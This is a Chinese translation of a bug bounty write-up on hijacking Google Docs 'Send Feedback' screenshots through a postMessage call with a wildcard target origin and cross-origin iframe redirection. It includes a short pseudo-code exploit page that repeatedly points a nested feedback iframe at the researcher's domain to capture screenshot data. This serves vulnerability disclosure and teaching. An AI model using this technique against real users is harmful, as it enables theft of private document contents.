详解我如何劫持 Google Docs 截屏并获得奖金

2024-01-12 07:48

本文主要是介绍详解我如何劫持 Google Docs 截屏并获得奖金,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

 聚焦源代码安全,网罗国内外最新资讯!

我可以利用 postmessage 配置不当和一个浏览器行为劫持任意文档的 Google Docs 截屏。

谷歌的多数产品中拥有一个名为 “Send Feedback” 的功能。如这个功能的名称所示,当用户遇到问题时,该功能有助于谷歌获得用户反馈。该功能还提供了一种选项,可为截屏附加一个简短的问题说明。

由于在多数谷歌站点中都是一个常见的功能,谷歌在 https://www.google.com 中部署了该功能,并且通过iFrame 集成到其它域名中。

工作原理

我们假设使用 Google Docs (https://docs.google.com/document) 提交反馈的流程:首先,导航到 Help--> Send Feedback,之后你会看到一个 iFrame 弹出并魔术般地加载你正在处理的文档截屏。由于该 iframe 的来源 (www.google.com) 不同于 Google Docs (docs.google.com),因此要成功地渲染该截屏,肯定存在某种跨来源通信方法。这时候,PostMessage 就派上用场了!工作流基本应该是:Google Docs 通过 postmessage  将每个像素的 RGB 值发送给主 iframe (www.google.com)中,之后将这些 RGB 值通过 postmessage 发送给它的 iframe (feedback.googleusercontent.com),之后从那些像素中渲染图像并将 base64 编码的数据-URI 发送回主 iFrame。

该进程结束后,我们必须为该反馈写一个声明,并点击,将带有图像 (data-uri) 的说明通过 postmessage 发送给 https://www.google.com (提交 Feedback)。

猎洞

理解了这个功能后,我最初的想法是从沙箱域名 feedbackgoogleusercontent.com 中找到一个 XSS。利用该 XSS,我可以劫持像素的 RGB 值,渲染该图像并窃取截屏。我之所以很确认我将发现一个 XSS,是因为它是一个沙箱域名。但事实并非如此。尝试数天之后,我向 S1r1us 求助。我们花了5天的时间尝试寻找 XSS,但均以失败告终,遂放弃。一周后,我发现了 fieldescriptor 发的视频。

观看视频后,我学到了一种新技术:你可以更改位于跨来源域名中 iFrame 的位置(前提是该域名缺乏 X-Frame-Header)。例如,如果 abc.com 将 efg.com 作为iframe 且 abc.com 并不拥有 X-Frame 标头,则我可以使用 frames.location 将 efg.com 更改为 evil.com 跨来源。

现在,我正在思考利用该行为的方法。如果我尝试将 feedback 功能中的这些 iframe 替换为我的域名会发生什么?它会将postmessage 发送给我吗?我决定尝试一下。我尝试用 geekycat.in 替换 feedback.googleusercontent.com 域名,但失败了。

虽然将数据发送给 feedback.googleusercontent.com,但发送的内容和下面的差不多:

windowRef.postmessage("<Data>","https://feedback.googleusercontent.com");

因此,即使我更改了 iframe 的位置,由于 postmessage 配置中的匹配不当问题,数据也不会发送到我的域名中。绝望之下,我尝试将 (Submit Feedback www,google.com) iframe 更改到我的域名中,这次成功了!为什么?

关于提交反馈的最后一条 postmessage 的配置类似于 windowRef.postmessage (“<Data>”,”*”);由于不存在域名检查,该浏览器愉快地将数据发送到我的域名,使我能够捕获并劫持该截屏。

且慢!我说过父域名不该具有 X-Frame 标头,但我是怎么实现的?幸运的是,Google Docs 并未设置该标头。是的!它仍然还未设置。在向谷歌提交点击劫持报告之前,会注意到站点部署着一些防止点击劫持的其它保护措施,在嵌入 iFrame 中时多数选项被禁用。

这种行为见如下 Liveoverflow 视频。

Exploit

拼在一起,就是:

<html><iframe src="https://docs.google.com/document/ID" /><script>//pseudo codesetTimeout(function(){ exp(); }, 6000);function exp(){setInterval(function(){ window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";}, 100);}
</script>
</html>

在将 setTimeout 设置为6秒后再调用该函数是为了提供 iFrame 加载的时间。另外一个问题是,只有在用户明确点击 “发送反馈“ 选项时才会创建该 iFrame。因此我们必须每隔100毫秒就更改一次 iFrame 的位置,即使它并不存在也是如此,以确保当该框架被创建时就会被劫持。

PoC

推荐阅读

谷歌发布 V8 Exploit 漏洞奖励计划,奖金加倍

谷歌发布 XS-Leaks 漏洞知识库

对 *.google.com/* 产品进行大规模的 CSRFing 研究,意外获得3万美元奖金

原文链接

https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/

题图:Pixabay License

本文由奇安信代码卫士编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的

产品线。

    觉得不错,就点个 “在看” 或 "赞” 吧~

这篇关于详解我如何劫持 Google Docs 截屏并获得奖金的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


原文地址:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.chinasem.cn/article/597231

相关文章

Java Spring 中的监听器Listener详解与实战教程

《JavaSpring中的监听器Listener详解与实战教程》Spring提供了多种监听器机制,可以用于监听应用生命周期、会话生命周期和请求处理过程中的事件,:本文主要介绍JavaSprin... 目录一、监听器的作用1.1 应用生命周期管理1.2 会话管理1.3 请求处理监控二、创建监听器2.1 Ser

maven中的maven-antrun-plugin插件示例详解

《maven中的maven-antrun-plugin插件示例详解》maven-antrun-plugin是Maven生态中一个强大的工具,尤其适合需要复用Ant脚本或实现复杂构建逻辑的场景... 目录1. 核心功能2. 典型使用场景3. 配置示例4. 关键配置项5. 优缺点分析6. 最佳实践7. 常见问题

JVisualVM之Java性能监控与调优利器详解

《JVisualVM之Java性能监控与调优利器详解》本文将详细介绍JVisualVM的使用方法,并结合实际案例展示如何利用它进行性能调优,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全... 目录1. JVisualVM简介2. JVisualVM的安装与启动2.1 启动JVisualVM2

Redis中的Lettuce使用详解

《Redis中的Lettuce使用详解》Lettuce是一个高级的、线程安全的Redis客户端,用于与Redis数据库交互,Lettuce是一个功能强大、使用方便的Redis客户端,适用于各种规模的J... 目录简介特点连接池连接池特点连接池管理连接池优势连接池配置参数监控常用监控工具通过JMX监控通过Pr

MySQL 添加索引5种方式示例详解(实用sql代码)

《MySQL添加索引5种方式示例详解(实用sql代码)》在MySQL数据库中添加索引可以帮助提高查询性能,尤其是在数据量大的表中,下面给大家分享MySQL添加索引5种方式示例详解(实用sql代码),... 在mysql数据库中添加索引可以帮助提高查询性能,尤其是在数据量大的表中。索引可以在创建表时定义,也可

C++ RabbitMq消息队列组件详解

《C++RabbitMq消息队列组件详解》:本文主要介绍C++RabbitMq消息队列组件的相关知识,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧... 目录1. RabbitMq介绍2. 安装RabbitMQ3. 安装 RabbitMQ 的 C++客户端库4. A

MySQL 存储引擎 MyISAM详解(最新推荐)

《MySQL存储引擎MyISAM详解(最新推荐)》使用MyISAM存储引擎的表占用空间很小,但是由于使用表级锁定,所以限制了读/写操作的性能,通常用于中小型的Web应用和数据仓库配置中的只读或主要... 目录mysql 5.5 之前默认的存储引擎️‍一、MyISAM 存储引擎的特性️‍二、MyISAM 的主

使用C#删除Excel表格中的重复行数据的代码详解

《使用C#删除Excel表格中的重复行数据的代码详解》重复行是指在Excel表格中完全相同的多行数据,删除这些重复行至关重要,因为它们不仅会干扰数据分析,还可能导致错误的决策和结论,所以本文给大家介绍... 目录简介使用工具C# 删除Excel工作表中的重复行语法工作原理实现代码C# 删除指定Excel单元

mybatis的mapper对应的xml写法及配置详解

《mybatis的mapper对应的xml写法及配置详解》这篇文章给大家介绍mybatis的mapper对应的xml写法及配置详解,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,... 目录前置mapper 对应 XML 基础配置mapper 对应 xml 复杂配置Mapper 中的相

MySQL 事务的概念及ACID属性和使用详解

《MySQL事务的概念及ACID属性和使用详解》MySQL通过多线程实现存储工作,因此在并发访问场景中,事务确保了数据操作的一致性和可靠性,下面通过本文给大家介绍MySQL事务的概念及ACID属性和... 目录一、什么是事务二、事务的属性及使用2.1 事务的 ACID 属性2.2 为什么存在事务2.3 事务